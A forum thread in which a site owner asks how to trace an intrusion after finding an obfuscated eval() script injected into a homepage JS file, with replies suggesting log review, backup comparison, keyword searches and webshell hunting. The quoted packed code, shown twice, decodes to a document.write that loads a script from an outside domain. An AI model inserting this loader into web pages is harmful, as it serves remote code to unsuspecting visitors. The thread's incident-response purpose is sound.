21,886
社区成员
发帖
与我相关
我的任务
分享首页包含的js文件中,被人注入下面的js代码的问题,在线等
linux+php+mysql的网站中,首页包含的js文件中,被人注入下面的js代码,
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) {
d[e(c)] = k[c] || e(c)
}
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
} ('G(f(p,a,c,k,e,d){e=f(c){h c.i(H)};m(!\'\'.l(/^/,z)){j(c--){d[c.i(a)]=k[c]||c.i(a)}k=[f(e){h d[e]}];e=f(){h\'\\\\w+\'};c=1};j(c--){m(k[c]){p=p.l(x v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}h p}(\'4.3(\\\'<2 0="1://5.6.a/9/8.7"></b>\\\');\',n,n,\'F|E|A|B|C|D|y|r|q|o|s|t\'.u(\'|\'),0,{}))', 44, 44, '|||||||||||||||function||return|toString|while||replace|if|12|spcode||cp|js|com|script|split|RegExp||new|googleadsl|String|SCRIPT|write|document|www|http|src|eval|36'.split('|'), 0, {}))
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
thanks
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) {
d[e(c)] = k[c] || e(c)
}
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
} ('G(f(p,a,c,k,e,d){e=f(c){h c.i(H)};m(!\'\'.l(/^/,z)){j(c--){d[c.i(a)]=k[c]||c.i(a)}k=[f(e){h d[e]}];e=f(){h\'\\\\w+\'};c=1};j(c--){m(k[c]){p=p.l(x v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}h p}(\'4.3(\\\'<2 0="1://5.6.a/9/8.7"></b>\\\');\',n,n,\'F|E|A|B|C|D|y|r|q|o|s|t\'.u(\'|\'),0,{}))', 44, 44, '|||||||||||||||function||return|toString|while||replace|if|12|spcode||cp|js|com|script|split|RegExp||new|googleadsl|String|SCRIPT|write|document|www|http|src|eval|36'.split('|'), 0, {}))
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
thanks
...全文
请发表友善的回复…
发表回复
futurecs 2011-06-10
- 打赏
- 举报
UltraCompare 不知道能不能在linux上跑,不行的话楼主把站点打包到本地对比下
futurecs 2011-06-10
- 打赏
- 举报
有最近的整站备份文件吗? 可以用UltraCompare的2进制对比一下 现在的整站目录和备份的整站目录,
哪些文件不一样、哪个字符不一样、 多了哪些文件少了哪些,一下就对比出来了。
哪些文件不一样、哪个字符不一样、 多了哪些文件少了哪些,一下就对比出来了。
qazwsxhai 2011-06-10
- 打赏
- 举报
找webshell 先找最新更新的文件...
黄袍披身 2011-06-10
- 打赏
- 举报
入侵入口 可以从服务器的日志进行分析,但是如果对方有足够的权限那么日志也是可以篡改的.所以你的2 也没有啥意义。不过前提先认为对方还没有那个权限,或者没那个能力吧.
查看文件修改时间和 日志里时间范围的访问文件.
查看文件修改时间和 日志里时间范围的访问文件.
zgycsmb 2011-06-10
- 打赏
- 举报
现有access_log文件,
再问:1如何找入侵的入口
2注入js时,一般会在log文件中留下怎么个记录?
再问:1如何找入侵的入口
2注入js时,一般会在log文件中留下怎么个记录?
黄袍披身 2011-06-10
- 打赏
- 举报
根据文件修改的时间进行筛选,只能是慢慢的找 比较了.细心。是不是网站有上传权限?留言板之类的有漏洞
床上等您 2011-06-10
- 打赏
- 举报
如何找入侵的入口
这个很难说,一般会利用 sql ,上传等获得权限,然后上传webshell等。
还有没有残留的木马文件
这个搜一下是否存在 eval, iframe 这些关键词。
这个很难说,一般会利用 sql ,上传等获得权限,然后上传webshell等。
还有没有残留的木马文件
这个搜一下是否存在 eval, iframe 这些关键词。
zgycsmb 2011-06-10
- 打赏
- 举报
与注入的木马文件已查到,并用备份copy了,
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
床上等您 2011-06-10
- 打赏
- 举报
被注入过的,基本都是希望渺茫了。。。
webshell一般都会存在,你一个一个的查,查死你。
最好把备份恢复下
看看是否在上传的漏洞。
webshell一般都会存在,你一个一个的查,查死你。
最好把备份恢复下
看看是否在上传的漏洞。
